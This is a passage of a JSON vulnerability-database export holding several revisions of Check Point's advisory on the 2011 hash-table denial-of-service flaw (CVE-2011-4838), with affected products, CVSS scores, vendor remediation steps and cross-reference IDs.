"UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863735", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310831554", "OPENVAS:863921", "OPENVAS:1361412562310122001", "OPENVAS:71568", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120218", "OPENVAS:881075", "OPENVAS:881167", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310864028", "OPENVAS:863681", "OPENVAS:1361412562310863815", "OPENVAS:1361412562310863706", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310881142", "OPENVAS:1361412562310122002", "OPENVAS:831554", "OPENVAS:70754", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310863921", "OPENVAS:870638", "OPENVAS:1361412562310863712", "OPENVAS:1361412562310870542"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL13588.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0420.NASL", "REDHAT-RHSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "GENTOO_GLSA-201207-06.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-1301.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2012-0504.NASL", "DEBIAN_DLA-209.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:8893F20D13", "FEDORA:6D8EE20EB6", "FEDORA:3515C213E6", "FEDORA:BFF2C21133", "FEDORA:6097820D6A"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-11T03:12:21", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-11T03:12:21", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-11T03:12:21", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-11T11:09:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "seebug", "idList": ["SSV:30071", "SSV:26126", "SSV:30001", "SSV:26122", "SSV:26121", "SSV:72454"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310870638", "OPENVAS:831554", "OPENVAS:1361412562310122001", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870542", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310881167", "OPENVAS:863681", "OPENVAS:70754", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310120218", "OPENVAS:863921", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:863735", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:863963", "OPENVAS:870638", "OPENVAS:136141256231070735"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "GENTOO_GLSA-201207-06.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2012-1262.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "ALA_ALAS-2012-35.NASL", "CENTOS_RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "SOLARIS11_RUBY_20120417.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2011-17542.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:6D55C20D95", "FEDORA:4930D21410"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0093", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-11T11:09:54", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-11T11:09:54", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-11T11:09:54", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-12T07:06:39", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "seebug", "idList": ["SSV:26121", "SSV:26122", "SSV:26126", "SSV:72454", "SSV:30001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070754", "OPENVAS:1361412562310120218", "OPENVAS:863963", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310863681", "OPENVAS:71568", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310863740", "OPENVAS:1361412562310122002", "OPENVAS:863742", "OPENVAS:863681", "OPENVAS:70754", "OPENVAS:1361412562310863824", "OPENVAS:863921", "OPENVAS:1361412562310881226", "OPENVAS:881167", "OPENVAS:831554", "OPENVAS:863824", "OPENVAS:136141256231071568", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310870638", "OPENVAS:881075", "OPENVAS:870638"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0069.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2012-1301.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2011-17542.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2012-1262.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "GENTOO_GLSA-201207-06.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:6D55C20D95", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0092", "RHSA-2012:0069", "RHSA-2012:0093", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-12T07:06:39", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-12T07:06:39", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-12T07:06:39", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-12T19:11:55", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4838", "CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:30071", "SSV:72454", "SSV:30001", "SSV:26122", "SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:71568", "OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310881226", "OPENVAS:863963", "OPENVAS:881167", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:1361412562310122001", "OPENVAS:870529", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881119", "OPENVAS:136141256231070735", "OPENVAS:1361412562310122002", "OPENVAS:863921", "OPENVAS:831554", "OPENVAS:1361412562310122012", "OPENVAS:870638", "OPENVAS:1361412562310881167"]}, {"type": "nessus", "idList": ["FEDORA_2012-0504.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "REDHAT-RHSA-2012-0019.NASL", "REDHAT-RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "SOLARIS11_RUBY_20120417.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ALA_ALAS-2012-35.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-1262.NASL", "FEDORA_2012-1301.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2011-17542.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7706F20CE7", "FEDORA:6D8EE20EB6", "FEDORA:7F79620D03", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "rubygems", "idList": 